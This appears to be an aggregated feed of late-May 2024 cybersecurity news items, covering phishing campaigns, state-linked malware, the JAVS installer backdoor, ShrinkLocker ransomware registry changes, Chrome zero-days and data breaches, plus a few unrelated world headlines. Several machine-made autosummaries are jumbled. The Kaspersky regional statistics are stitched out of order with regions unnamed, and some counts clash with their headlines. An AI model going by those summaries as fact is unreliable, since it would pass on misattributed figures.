          Autosummary: In 2024, 53% of CISOs admitted to burnout compared to 60% last year, while 66% feel they face excessive expectations, a steady increase from 61% last year and 49% in 2022. CISOs’ confidence is growing despite fear of cyber attacks: 70% of surveyed CISOs feel at risk of a material cyber attack over the next 12 months, compared to 68% the year before, and 48% in 2022.


          Ransomware operators shift tactics as law enforcement disruptions increase

          exploits industry
          2024-05-27 https://www.helpnetsecurity.com/2024/05/27/ransomware-attacks-surge-video/

          Ransomware remains one of the most pressing cybersecurity threats in 2024, with attackers continually evolving their methods to maximize impact and evade detection. In this Help Net Security round-up, we present excerpts from previously recorded videos featuring cybersecurity experts discussing ransomware-related topics such as payment practices, the recent surge in ransomware attacks, and more. Complete videos: Steve Gwizdala, VP of Healthcare at ForgeRock, discusses how vigilance and new ways of enhancing cybersecurity measures will be …

          The post Ransomware operators shift tactics as law enforcement disruptions increase appeared first on Help Net Security.



          New Tricks in the Phishing Playbook: Cloudflare Workers, HTML Smuggling, GenAI

          financial
          2024-05-27 https://thehackernews.com/2024/05/new-tricks-in-phishing-playbook.html
          Cybersecurity researchers are alerting of phishing campaigns that abuse Cloudflare Workers to serve phishing sites that are used to harvest users' credentials associated with Microsoft, Gmail, Yahoo!, and cPanel Webmail. The attack method, called transparent phishing or adversary-in-the-middle (AitM) phishing, "uses Cloudflare Workers to act as a reverse proxy server for a

          Autosummary: Financial services, manufacturing, energy/utilities, retail, and consulting entities located in the U.S., Canada, Germany, South Korea, and Norway have emerged as the top sectors targeted by the Greatness PhaaS. "These services offer advanced capabilities that appeal to attackers by saving them time on development and evasion tactics," Trellix researchers said. The attack method, called transparent phishing or adversary-in-the-middle (AitM) phishing, "uses Cloudflare Workers to act as a reverse proxy server for a legitimate login page, intercepting traffic between the victim and the login page to capture credentials, cookies, and tokens," Netskope researcher Jan Michael Alcantara said in a report.


          Pakistan-linked Hackers Deploy Python, Golang, and Rust Malware on Indian Targets

          exploits
          2024-05-27 https://thehackernews.com/2024/05/pakistan-linked-hackers-deploy-python.html
          The Pakistan-nexus Transparent Tribe actor has been linked to a new set of attacks targeting Indian government, defense, and aerospace sectors using cross-platform malware written in Python, Golang, and Rust. "This cluster of activity spanned from late 2023 to April 2024 and is anticipated to persist," the BlackBerry Research and Intelligence Team said in a technical report

          Autosummary: BlackBerry said it also discovered bash script versions and Python-based Windows binaries being served from the threat actor-controlled domain "apsdelhicantt[.]in":
          swift_script.sh, a bash version of GLOBSHELL
          Silverlining.sh, an open-source command-and-control (C2) framework called Sliver
          swift_uzb.sh, a script to gather files from a connected USB drive
          afd.exe, an intermediate executable responsible for downloading win_hta.exe and win_service.exe
          win_hta.exe and win_service.exe, two Windows versions of GLOBSHELL
          In what's a sign of Transparent Tribe's tactical evolution, phishing campaigns orchestrated in October 2023 have been observed making use of ISO images to deploy the Python-based remote access trojan that uses Telegram for C2 purposes.


          A high-severity vulnerability affects Cisco Firepower Management Center

          exploits
          2024-05-27 https://securityaffairs.com/163718/security/a-high-severity-vulnerability-affects-cisco-firepower-management-center.html
          Cisco addressed a SQL injection vulnerability in the web-based management interface of the Firepower Management Center (FMC) Software. Cisco addressed a vulnerability, tracked as CVE-2024-20360 (CVSS score 8.8), in the web-based management interface of the Firepower Management Center (FMC) Software. The vulnerability is a SQL injection issue; an attacker can exploit the flaw to obtain […]



          Threat landscape for industrial automation systems. Q1 2024

          industry
          2024-05-27 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q1-2024/
          In the first quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.3 pp from the previous quarter to 21.4%. Compared to the first quarter of 2023, the percentage decreased by 1.3 pp.

          Autosummary: Percentage of ICS computers on which malicious objects of each category were blocked (previous quarter vs. Q1 2024, change in percentage points):
          Category                                              Q4 2023   Q1 2024   Change
          [category cut off in the excerpt]                     7.61%     5.84%     -1.77 pp
          Spy Trojans, backdoors and keyloggers                 3.86%     3.90%     +0.04 pp
          Malicious documents (MSOffice + PDF)                  2.02%     1.72%     -0.30 pp
          Viruses                                               1.48%     1.56%     +0.08 pp
          Worms                                                 1.55%     1.51%     -0.04 pp
          Miners in the form of executable files for Windows    0.84%     0.92%     +0.08 pp
          Web miners running in browsers                        0.45%     0.49%     +0.04 pp
          Malware for AutoCAD                                   0.36%     0.41%     +0.05 pp
          Ransomware                                            0.17%     0.15%     -0.02 pp
          Main threat sources                                   Q4 2023   Q1 2024   Change
          Internet                                              13.25%    12.24%    -1.01 pp
          Email clients                                         3.15%     3.04%     -0.11 pp
          Removable media                                       1.29%     1.13%     -0.16 pp
          Network folders                                       0.17%     0.15%     -0.02 pp
          Statistics across all threats: In the first quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.3 pp from the previous quarter to 21.4%. This group includes Windows computers that serve one or several of the following purposes:
          Supervisory control and data acquisition (SCADA) servers
          Data storage (Historian) servers
          Data gateways (OPC)
          Stationary workstations of engineers and operators
          Mobile workstations of engineers and operators
          Human machine interface (HMI)
          OT network administration computers
          ICS software development computers
          We consider a computer as attacked if a Kaspersky security solution blocked one or more threats on that computer during the period in review: a month, six months, or a year depending on the context, as can be seen in the charts above.
          Malicious object categories: Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose:
          Malicious objects used for initial infection
          Next-stage malware
          Self-propagating malware
          Malicious objects used for initial infection include dangerous web resources, malicious scripts, and malicious documents.
          [Figure: Change in percentage of ICS computers blocked by various categories of malicious objects in Q1 2024]
          Compared to the previous quarter, in the first quarter of 2024, the most significant increase in the percentage of ICS computers on which malicious objects of various categories were blocked was as follows: AutoCAD malware – by 1.16 times.
          [Figure: Percentage of ICS computers on which malicious objects were blocked, by month, 2021–2024]
          Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 34.2% in Africa to 11.5% in Northern Europe.


          Threat landscape for industrial automation systems. Regions, Q1 2024

          industry
          2024-05-27 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-regions-q1-2024/
          The percentage of ICS computers on which malicious objects were blocked during the quarter varied regionally from 34.2% in Africa to 11.5% in Northern Europe. Africa and South-East Asia saw their percentages increase from the previous quarter.

          Autosummary: The leading regions by percentage of ICS computers on which threats from these sources were blocked are the following:
          Internet threats: Africa – 14.82%; South-East Asia – 14.01%
          Email threats: Southern Europe – 6.85%; Latin America – 5.09%
          Denylisted internet resources. The leading regions by percentage of ICS computers on which denylisted internet resources were blocked were: Africa – 8.78%; Russia – 7.49%; South Asia – 7.48%
          Malicious scripts and phishing pages. The leading regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were: Latin America – 7.23%; Southern Europe – 6.96%; Middle East – 6.95%
          Malicious documents. The leading regions by percentage of ICS computers on which malicious documents were blocked were: Southern Europe – 3.24%; Latin America – 2.94%; Eastern Europe – 2.33%
          Next-stage malware. Malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers. In similar regional rankings, worms are in fourth place in four regions: Africa – 5.29%; Central Asia – 2.88%; Middle East – 2.40%; South Asia – 1.95%. The top regions for worms were the leading regions by percentage of ICS computers on which threats were blocked when connecting removable media: Africa – 5.60%; South Asia – 2.46%
          Viruses. The leading regions by percentage of ICS computers on which viruses were blocked were: South-East Asia – 7.61%; Africa – 4.09%; East Asia – 2.89%. In South-East Asia, viruses are in first place (!)
          Covert crypto-mining programs. Web miners running in browsers: the leading regions by percentage of ICS computers on which web miners running in browsers were blocked were: Africa – 0.91%; Middle East – 0.84%; Australia and New Zealand – 0.78%. In the regional rankings of threat categories by percentage of ICS computers on which they were blocked, web miners ended up in fifth place regionally (eighth place globally): Australia and New Zealand – 0.78%; US and Canada – 0.45%; Northern Europe – 0.27%. In Q1 2024, the percentage of ICS computers on which web miners running in browsers were blocked increased in all regions except Russia and Central Asia.
          20–25%: Eastern Europe – 24.7%; Russia – 23.6%; Latin America – 23.5%; South Asia – 23.5%; Southern Europe – 21.4%; East Asia – 20.3%
          Up to 20%: Australia and New Zealand – 16.2%; US and Canada – 13.3%; Western Europe – 12.3%; Northern Europe – 11.5%. The third group contains the regions that are the safest in terms of cybersecurity.
          The three leading regions by percentage of ICS computers on which spyware was blocked were also the leading regions for malware from the first mentioned group: Africa – 6.65%; Middle East – 5.89%; Southern Europe – 5.45%. In almost all regions, in the threat category rankings by percentage of ICS computers on which it was blocked, spyware does not rank higher than third place, except for two regions. East Asia: in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked, at 3.68%.
          Compared to the global figures, the region has a significantly higher percentage of ICS computers on which the following was blocked: AutoCAD malware, by 6.8 times; Viruses, by 4 times; Spyware, by 1.3 times; Malicious documents, by 1.3 times; Ransomware, by 1.2 times. Quarterly changes: the largest quarterly increase was in the percentage of ICS computers on which the following was blocked: AutoCAD malware, by 1.4 times; Viruses, by 1.2 times. Current threats: Viruses.
          Compared to the global average, the region has a higher percentage of ICS computers on which the following was blocked: Malicious documents, by 1.9 times; Spyware, by 1.4 times; Malicious scripts and phishing pages, by 1.2 times. Quarterly changes: the largest quarterly increase was in the percentage of ICS computers on which covert crypto-mining malware was blocked: Miners in the form of executable files for Windows, by 1.7 times; Web miners, by 1.6 times.
          Quarterly changes: the largest quarterly increase was in the percentage of ICS computers on which the following was blocked: Web miners, by 1.5 times; Miners in the form of executable files for Windows, by 1.5 times. Current threats: Q1 2024 saw an increase in the percentage of ICS computers on which the following threats were blocked: Miners in the form of executable files for Windows; Web miners. The region is safe overall.
          South Asia – 2.46%; Central Asia – 1.51%
          Worms. The leading regions by percentage of ICS computers on which worms were blocked were: Africa – 5.29%; Central Asia – 2.88%; Middle East – 2.40%. Globally, worms are in sixth place in the threat category ranking by percentage of ICS computers on which they were blocked.
          Spyware, by 1.5 times; Viruses, by 1.5 times. Quarterly changes: the largest quarterly increase was in the percentage of ICS computers on which covert crypto-mining malware was blocked: Web miners, by 1.3 times; Miners in the form of executable files for Windows, by 1.2 times. Current threats: Ransomware. From Q4 2022 through Q3 2023, the Middle East held second place in the regional ranking for this threat category.
          Compared to the global average, the region has a higher percentage of ICS computers on which the following was blocked: Malicious documents, by 1.7 times; Malicious scripts and phishing pages, by 1.2 times; Spyware, by 1.2 times; Web miners. Quarterly changes: the largest quarterly increase was in the percentage of ICS computers on which the following was blocked: Spyware, by 1.3 times. Denylisted internet resources are slowly growing for the second quarter in a row.
          Covert crypto-mining programs. Miners in the form of executable files for Windows: the leading regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked were: Central Asia – 1.78%; Russia – 1.38%; Eastern Europe – 1.06%. In the global rankings of threat categories by percentage of ICS computers on which they were blocked, miners in the form of Windows executable files are in seventh place.
          From a global perspective, it has a significantly higher percentage of ICS computers on which the following was blocked: Worms, by 3.5 times; Viruses, by 2.6 times; Spyware, by 1.7 times; Ransomware, by 1.8 times; Web miners, by 1.8 times. Worms and viruses outpaced malicious documents in the threat category ranking by percentage of ICS computers on which they were blocked.
          Miners in the form of executable files for Windows, by 1.6 times; AutoCAD malware, by 1.4 times. Current threats: Malicious scripts and phishing pages. Q1 2024 saw an increase in the percentage of ICS computers on which the following threats were blocked: Web miners; Miners in the form of executable files for Windows; AutoCAD malware. Based on the combination of indicators, the region is safe overall.
          All regions ranked by percentage of ICS computers on which malicious objects were blocked in the first quarter can be divided into three groups:
          Over 25%: Africa – 32.4%; South-East Asia – 29.7%; Middle East – 26.9%; Central Asia – 26.8%. In the regions of this group, ICS cybersecurity requires close attention and improvement.
          Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following was blocked: Viruses, by 1.9 times; AutoCAD malware, by 3.6 times. Quarterly changes. Current threats: Spyware; Viruses; AutoCAD malware. It is likely that the active use of spyware by cybercriminals leads to a high percentage of compromised authentication data in industrial enterprise systems, which significantly increases the risks of subsequent targeted attacks.
          Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following was blocked: Ransomware, by 1.9 times; Web miners, by 1.7 times; Worms, by 1.6 times. Worms were fourth in the ranking of malware categories by percentage of ICS computers on which they were blocked (sixth globally).


          Report: The Dark Side of Phishing Protection

          financial
          2024-05-27 https://thehackernews.com/2024/05/report-dark-side-of-phishing-protection.html
          The transition to the cloud, poor password hygiene and the evolution in webpage technologies have all enabled the rise in phishing attacks. But despite sincere efforts by security stakeholders to mitigate them - through email protection, firewall rules and employee education - phishing attacks are still a very risky attack vector. A new report by LayerX explores the state of

          Autosummary: Based on a number of sources, the report describes the magnitude of the problem: a 61% increase in overall phishing attacks on enterprises; 83% of organizations were subject to a successful phishing attack; over 1100% increase in phishing URLs hosted on legitimate SaaS platforms. A Phishing Attack Breakdown: Where is the Protection Blind Spot? Deep Dive: Browser Security Platform and Deep Session Inspection 101. The key takeaway from the report is that IT and security experts should evaluate a browser security platform as part of their phishing protection stack. "


          New ATM Malware family emerged in the threat landscape

          financial exploits
          2024-05-27 https://securityaffairs.com/163732/malware/eu-atm-malware.html
          Experts warn of a new ATM malware family that is advertised in the cybercrime underground; it was developed to target Europe. A threat actor is advertising a new ATM malware family that claims to be able to compromise 99% of devices in Europe. The threat actor is offering the malware for $30,000, and he claims that […] "

          Autosummary: "


          Kidnapped man running for mayor in Mexico found alive

          latam
          2024-05-27 https://www.bbc.com/news/articles/cn44zzgqp0go
          A candidate for mayor is the latest Mexican politician to be targeted amid a surge of violence. "

          Autosummary: "


          Sav-Rx discloses data breach impacting 2.8 million Americans

          financial
          2024-05-27 https://www.bleepingcomputer.com/news/security/sav-rx-discloses-data-breach-impacting-28-million-americans/
          Prescription management company Sav-Rx is warning over 2.8 million people in the United States that it suffered a data breach, stating that their personal data was stolen in a 2023 cyberattack. [...] "

          Autosummary: The types of data exposed in this incident include: full name, date of birth, Social Security Number (SSN), email address, physical address, phone number, eligibility data, and insurance identification number. In a FAQ page on its site, Sav-Rx explains that it took them eight months to send out notices of breach to impacted customers because their initial priority was to minimize interruption to patient care before launching an investigation on the impact of the incident. "


          TP-Link fixes critical RCE bug in popular C5400X gaming router

          exploits
          2024-05-27 https://www.bleepingcomputer.com/news/security/tp-link-fixes-critical-rce-bug-in-popular-c5400x-gaming-router/
          The TP-Link Archer C5400X gaming router is vulnerable to security flaws that could enable an unauthenticated, remote attacker to execute commands on the device. [...] "

          Autosummary: "


          Sav-Rx data breach impacted over 2.8 million individuals

          financial
          2024-05-27 https://securityaffairs.com/163748/data-breach/sav-rx-data-breach.html
          Prescription service firm Sav-Rx disclosed a data breach that potentially impacted over 2.8 million people in the United States. Prescription service company Sav-Rx disclosed a data breach after a 2023 cyberattack. The company is notifying 2,812,336 individuals impacted by the security breach in the United States. A&A Services, which operates as Sav-RX, shared with the Maine […] "

          Autosummary: Compromised data includes full name, date of birth, Social Security Number (SSN), email address, physical address, phone number, eligibility data, and insurance identification number. "


          Malware-laced JAVS Viewer deploys RustDoor implant in supply chain attack

          exploits
          2024-05-26 https://securityaffairs.com/163683/hacking/supplay-chain-attack-javs-viewer.html
          Malicious actors compromised the JAVS Viewer installer to deliver the RustDoor malware in a supply chain attack. Rapid7 researchers warned that threat actors added a backdoor to the installer for the Justice AV Solutions JAVS Viewer software. The attackers were able to inject a backdoor in the JAVS Viewer v8.3.7 installer that is being distributed from […] "

          Autosummary: The Attacker has now developed a Windows version that merges with… https://t.co/Vi2sxZveGQ — 𝓙𝓪𝓬𝓴2 (@2RunJack2) April 2, 2024
          Rapid7 published Indicators of Compromise (IoC) for this attack; below is the attack timeline:
          Feb 10, 2024:
          May 13, 2024: Rapid7 identifies an unlinked installer file containing malware, the second Viewer package, still being served by the official vendor site.
          May 12, 2024: Rapid7 discovers three additional malicious payloads being hosted on the threat actor’s C2 infrastructure over port 8000: chrome_installer.exe, firefox_updater.exe, and OneDriveStandaloneUpdater.exe. "


          Waterborne disease outbreak after Brazil floods kills four

          latam
          2024-05-26 https://www.bbc.com/news/articles/cq559gexxy5o
          Authorities in Rio Grande do Sul are investigating more than 800 suspected cases of leptospirosis after unprecedented floods. "

          Autosummary: "


          Week in review: Google fixes yet another Chrome zero-day exploit, YouTube as a cybercrime channel

          exploits
          2024-05-26 https://www.helpnetsecurity.com/2024/05/26/week-in-review-google-fixes-yet-another-chrome-zero-day-exploit-youtube-as-a-cybercrime-channel/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Google fixes yet another Chrome zero-day exploited in the wild (CVE-2024-5274) For the eighth time this year, Google has released an emergency update for its Chrome browser that fixes a zero-day vulnerability (CVE-2024-5274) with an in-the-wild exploit. YouTube has become a significant channel for cybercrime Social engineering threats – those which rely on human manipulation – account for most cyberthreats … More

          The post Week in review: Google fixes yet another Chrome zero-day exploit, YouTube as a cybercrime channel appeared first on Help Net Security.

          "

          Autosummary: Microsoft has announced the Copilot+ line of Windows 11-powered PCs that, among other things, will have Recall, a feature that takes screenshots every few seconds, encrypts them, saves them, and leverages AI to allow users to search through them for specific content that has been viewed in apps, websites, documents, etc. Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Google fixes yet another Chrome zero-day exploited in the wild (CVE-2024-5274) For the eighth time this year, Google has released an emergency update for its Chrome browser that fixes a zero-day vulnerability (CVE-2024-5274) with an in-the-wild exploit. "


          Colombia begins exploring ‘holy grail of shipwrecks’

          latam
          2024-05-26 https://www.bbc.com/news/articles/c4nn983qmepo
          Exploration of a 300-year-old wreck in the Caribbean Sea with an estimated £16bn trove starts. "

          Autosummary: "


          CERT-UA warns of malware campaign conducted by threat actor UAC-0006

          exploits
          2024-05-26 https://securityaffairs.com/163711/cyber-warfare-2/cert-ua-warns-uac-0006-massive-campaigns.html
          The Ukraine CERT-UA warns of a concerning increase in cyberattacks attributed to the financially-motivated threat actor UAC-0006. The Computer Emergency Response Team of Ukraine (CERT-UA) warned of a surge in cyberattacks linked to the financially-motivated threat actor UAC-0006. UAC-0006 has been active since at least 2013. The threat actors focus on compromising accountants’ PCs (which […] "

          Autosummary: CERT-UA warns of malware campaign conducted by threat actor UAC-0006 Pierluigi Paganini May 26, 2024 The Ukraine CERT-UA warns of a concerning increase in cyberattacks attributed to the financially-motivated threat actor UAC-0006. "


          Hackers phish finance orgs using trojanized Minesweeper clone

          financial exploits
          2024-05-26 https://www.bleepingcomputer.com/news/security/hackers-phish-finance-orgs-using-trojanized-minesweeper-clone/
          Hackers are utilizing code from a Python clone of Microsoft's venerable Minesweeper game to hide malicious scripts in attacks on European and US financial organizations. [...] "

          Autosummary: "


          Chile arrests firefighter for blaze that killed 137

          latam
          2024-05-25 https://www.bbc.com/news/articles/czddewn1gd1o
          A forestry worker is also arrested and charged with arson over the fire - the country's deadliest. "

          Autosummary: "


          Fake AV websites used to distribute info-stealer malware

          exploits
          2024-05-25 https://securityaffairs.com/163673/cyber-crime/fake-av-websites-distribute-malware.html
          Threat actors used fake AV websites masquerading as legitimate antivirus products from Avast, Bitdefender, and Malwarebytes to distribute malware. In mid-April 2024, researchers at Trellix Advanced Research Center team spotted multiple fake AV sites used to distribute info-stealers. The malicious websites hosted sophisticated malicious files such as APK, EXE and Inno setup installer, including Spy […] "

          Autosummary: "


          Product showcase: Alert – Data breach detector for your email, credit card, and ID

          financial
          2024-05-24 https://www.helpnetsecurity.com/2024/05/24/product-showcase-surfshark-alert/

          Compared to the last quarter of 2023, data breaches rose from 81M to 435M in Q1 2024. That’s a 5-fold increase in just a few months. One of the most common ways data breaches happen is through apps like Facebook or Instagram, which collect a lot of user data. If their databases get compromised — so does the user data. To stay on top of your personal information security, try Surfshark’s advanced data security solution, … More

          The post Product showcase: Alert – Data breach detector for your email, credit card, and ID appeared first on Help Net Security.

          "

          Autosummary: With Alert, you can easily monitor your most important credentials, such as your email, credit card, and ID. Monitoring your most important details, such as emails, credit cards, and IDs, is the best way to prevent cybercriminals from exploiting your information. "


          Google fixes eighth actively exploited Chrome zero-day this year

          exploits
          2024-05-24 https://www.bleepingcomputer.com/news/security/google-fixes-eighth-actively-exploited-chrome-zero-day-this-year/
          Google has released a new emergency security update to address the eighth zero-day vulnerability in Chrome browser confirmed to be actively exploited in the wild. [...] "

          Autosummary: Third actively exploited zero-day this month CVE-2024-5274 is the eighth actively exploited vulnerability that Google fixed in Chrome since the beginning of the year, and the third this month. "


          Google fixes yet another Chrome zero-day exploited in the wild (CVE-2024-5274)

          exploits
          2024-05-24 https://www.helpnetsecurity.com/2024/05/24/cve-2024-5274/

          For the eighth time this year, Google has released an emergency update for its Chrome browser that fixes a zero-day vulnerability (CVE-2024-5274) with an in-the-wild exploit. About CVE-2024-5274 As per usual, Google keeps technical details of the vulnerability under wraps. All they tell us is that the vulnerability is a type confusion bug in V8, Chrome’s JavaScript and WebAssembly engine. “Google is aware that an exploit for CVE-2024-5274 exists in the wild,” the company says. … More

          The post Google fixes yet another Chrome zero-day exploited in the wild (CVE-2024-5274) appeared first on Help Net Security.

          "

          Autosummary: "


          Illumio and Netskope join forces to strengthen enterprise resilience against cyberattacks

          ciber
          2024-05-24 https://www.helpnetsecurity.com/2024/05/24/illumio-netskope-partnership/

          Illumio and Netskope announced a Zero Trust partnership that brings together the power of Zero Trust Segmentation (ZTS) and Zero Trust Network Access (ZTNA) to protect against breaches and build cyber resilience. The new partnership combines Illumio ZTS with Netskope ZTNA Next via the Netskope Cloud Exchange (CE) platform to enable network and security teams to create Zero Trust policies that consistently secure access at an organization’s perimeter and within its hybrid, multi-cloud infrastructure. In … More

          The post Illumio and Netskope join forces to strengthen enterprise resilience against cyberattacks appeared first on Help Net Security.

          "

          Autosummary: Next, organizations gain a consistent, real-time view of user-to-application and application-to-application traffic, enabling them to better understand risk end-to-end. "


          Courtroom Software Backdoored to Deliver RustDoor Malware in Supply Chain Attack

          exploits
          2024-05-24 https://thehackernews.com/2024/05/courtroom-software-backdoored-to.html
          Malicious actors have backdoored the installer associated with courtroom video recording software developed by Justice AV Solutions (JAVS) to deliver malware that's associated with a known backdoor called RustDoor. The software supply chain attack, tracked as CVE-2024-4978, impacts JAVS Viewer v8.3.7, a component of the JAVS Suite 8 that allows users to create, manage, publish, "

          Autosummary: "Analysis of the installer JAVS Viewer Setup 8.3.7.250-1.exe showed that it was signed with an unexpected Authenticode signature and contained the binary fffmpeg.exe," Rapid7 researchers said, adding it "observed encoded PowerShell scripts being executed by the binary fffmpeg.exe." Both fffmpeg.exe and the installer have been signed by an Authenticode certificate issued to "Vanguard Tech Limited," as opposed to "Justice AV Solutions Inc," the signing entity used to authenticate the legitimate versions of the software. "


          Japanese Experts Warn of BLOODALCHEMY Malware Targeting Government Agencies

          exploits government
          2024-05-24 https://thehackernews.com/2024/05/japanese-experts-warn-of-bloodalchemy.html
          Cybersecurity researchers have discovered that the malware known as BLOODALCHEMY used in attacks targeting government organizations in Southern and Southeastern Asia is in fact an updated version of Deed RAT, which is believed to be a successor to ShadowPad. "The origin of BLOODALCHEMY and Deed RAT is ShadowPad and given the history of ShadowPad being utilized in numerous APT "

          Autosummary: "


          Almost all citizens of city of Eindhoven have their personal data exposed

          government
          2024-05-24 https://www.bitdefender.com/blog/hotforsecurity/almost-all-citizens-of-city-of-eindhoven-have-their-personal-data-exposed/
          A data breach involving the Dutch city of Eindhoven left the personal information related to almost all of its citizens exposed. And then they chose not to tell the affected 221,511 people about it. Read more in my article on the Hot for Security blog. "

          Autosummary: Since last year, the municipality of Eindhoven has been the subject of stricter supervision by the Dutch data protection authority, concerned that personal data has not been handled with enough care following some 200 other breaches of varying size and severity. "


          Fake Antivirus Websites Deliver Malware to Android and Windows Devices

          exploits
          2024-05-24 https://thehackernews.com/2024/05/fake-antivirus-websites-deliver-malware.html
          Threat actors have been observed making use of fake websites masquerading as legitimate antivirus solutions from Avast, Bitdefender, and Malwarebytes to propagate malware capable of stealing sensitive information from Android and Windows devices. "Hosting malicious software through sites which look legitimate is predatory to general consumers, especially those who look to protect their devices "

          Autosummary: "


          Google Detects 4th Chrome Zero-Day in May Actively Under Attack - Update ASAP

          exploits
          2024-05-24 https://thehackernews.com/2024/05/google-detects-4th-chrome-zero-day-in.html
          Google on Thursday rolled out fixes to address a high-severity security flaw in its Chrome browser that it said has been exploited in the wild. Assigned the CVE identifier CVE-2024-5274, the vulnerability relates to a type confusion bug in the V8 JavaScript and WebAssembly engine. It was reported by Clément Lecigne of Google's Threat Analysis Group and Brendon Tiszka of "

          Autosummary: CVE-2024-4671 - Use-after-free in Visuals
          CVE-2024-4761 - Out-of-bounds write in V8
          CVE-2024-4947 - Type confusion in V8
          Users are recommended to upgrade to Chrome version 125.0.6422.112/.113 for Windows and macOS, and version 125.0.6422.112 for Linux to mitigate potential threats. "


          CISA adds Apache Flink flaw to its Known Exploited Vulnerabilities catalog

          exploits
          2024-05-24 https://securityaffairs.com/163635/security/cisa-apache-flink-flaw-known-exploited-vulnerabilities-catalog.html
          CISA adds Apache Flink improper access control vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a NextGen Healthcare Mirth Connect vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. The issue, tracked as CVE-2020-17519, is an improper access control vulnerability in Apache Flink. Apache Flink contains an improper access […] "

          Autosummary: "


          Cencora data breach exposes US patient info from 8 drug companies

          financial
          2024-05-24 https://www.bleepingcomputer.com/news/security/cencora-data-breach-exposes-us-patient-info-from-8-drug-companies/
          Some of the largest drug companies in the world have disclosed data breaches due to a February 2024 cyberattack at Cencora, whom they partner with for pharmaceutical and business services. [...] "

          Autosummary: "


          New ShrinkLocker ransomware uses BitLocker to encrypt your files

          exploits ransomware
          2024-05-24 https://www.bleepingcomputer.com/news/security/new-shrinklocker-ransomware-uses-bitlocker-to-encrypt-your-files/
          A new ransomware strain called ShrinkLocker creates a new boot partition to encrypt corporate systems using Windows BitLocker. [...] "

          Autosummary: Through dynamic malware analysis, Kaspersky researchers were able to confirm the malware making the following registry changes:
          fDenyTSConnections = 1 : disables RDP connections
          scforceoption = 1 : enforces smart card authentication
          UseAdvancedStartup = 1 : requires the use of the BitLocker PIN for pre-boot authentication
          EnableBDEWithNoTPM = 1 : allows BitLocker without a compatible TPM chip
          UseTPM = 2 : allows the use of TPM if available
          UseTPMPIN = 2 : allows the use of a startup PIN with TPM if available
          UseTPMKey = 2 : allows the use of a startup key with TPM if available
          UseTPMKeyPIN = 2 : allows the use of a startup key and PIN with TPM if available
          EnableNonTPM = 1 : allows BitLocker without a compatible TPM chip, requires a password or startup key on a USB flash drive
          UsePartialEncryptionKey = 2 : requires the use of a startup key with TPM
          UsePIN = 2 : requires the use of a startup PIN with TPM
          The threat actor behind ShrinkLocker does not drop a ransom file to establish a communication channel with the victim. "


          Google fixes eighth actively exploited Chrome zero-day this year, the third in a month

          exploits
          2024-05-24 https://securityaffairs.com/163642/hacking/8th-chrome-zero-day-2024-html.html
          Google rolled out a new emergency security update to fix another actively exploited zero-day vulnerability in the Chrome browser. Google has released a new emergency security update to address a new vulnerability, tracked as CVE-2024-5274, in the Chrome browser, it is the eighth zero-day exploited in attacks disclosed this year. The vulnerability is a high-severity […] "

          Autosummary: Google fixes eighth actively exploited Chrome zero-day this year, the third in a month Pierluigi Paganini May 24, 2024 Google rolled out a new emergency security update to fix another actively exploited zero-day vulnerability in the Chrome browser. (March 2024) CVE-2024-4671: a use-after-free issue that resides in the Visuals component (May 2024). "


          Mandatory reporting for ransomware attacks? – Week in security with Tony Anscombe

          exploits ransomware
          2024-05-24 https://www.welivesecurity.com/en/videos/mandatory-reporting-ransomware-attacks-week-security-tony-anscombe/
          As the UK mulls new rules for ransomware disclosure, what would be the wider implications of such a move, how would cyber-insurance come into play, and how might cybercriminals respond? "

          Autosummary: "


          Cencora data breach exposes US patient info from 11 drug companies

          financial
          2024-05-24 https://www.bleepingcomputer.com/news/security/cencora-data-breach-exposes-us-patient-info-from-11-drug-companies/
          Some of the largest drug companies in the world have disclosed data breaches due to a February 2024 cyberattack at Cencora, whom they partner with for pharmaceutical and business services. [...] "

          Autosummary: The eight firms impacted by this breach, all using almost identical data breach notifications, are: The data breach notices warn that Cencora's internal investigation, which concluded on April 10, 2024, confirmed that the following information had been exposed: full name, address, health diagnosis, medications, and prescriptions. "


          Ransomware fallout: 94% experience downtime, 40% face work stoppage

          exploits
          2024-05-23 https://www.helpnetsecurity.com/2024/05/23/ransomware-attacks-data-exfiltration/

          Within the last 12 months, 48% of organizations identified evidence of a successful breach within their environment, according to Arctic Wolf. To fully understand the gravity of this statistic, it is important to understand that, although 48% of these environments found evidence of a data breach, that does not inversely mean that 52% of organizations did not suffer a breach. Instead, it should be more accurately stated that the remaining 52% did not identify indicators … More

          The post Ransomware fallout: 94% experience downtime, 40% face work stoppage appeared first on Help Net Security.

          "

          Autosummary: To fully understand the gravity of this statistic, it is important to understand that, although 48% of these environments found evidence of a data breach, that does not inversely mean that 52% of organizations did not suffer a breach. "


          2024 sees continued increase in ransomware activity

          exploits ransomware
          2024-05-23 https://www.helpnetsecurity.com/2024/05/23/2024-ransomware-activity-video/

          In this Help Net Security video, Ryan Bell, Threat Intelligence Manager at Corvus Insurance, discusses how ransomware will continue to grow in 2024. In January, Corvus reported that global ransomware attacks in 2023 set a record high, surpassing 2022 by nearly 70 percent. Despite the disruption of two major ransomware groups, LockBit and ALPHV/BlackCat, which accounted for 22 percent and 8 percent of the activity, respectively, the ransomware threat remains resilient. Our Q1 ransomware report … More

          The post 2024 sees continued increase in ransomware activity appeared first on Help Net Security.

          "

          Autosummary: "


          HHS pledges $50M for autonomous vulnerability management solution for hospitals

          exploits
          2024-05-23 https://www.helpnetsecurity.com/2024/05/23/healthcare-vulnerability-management/

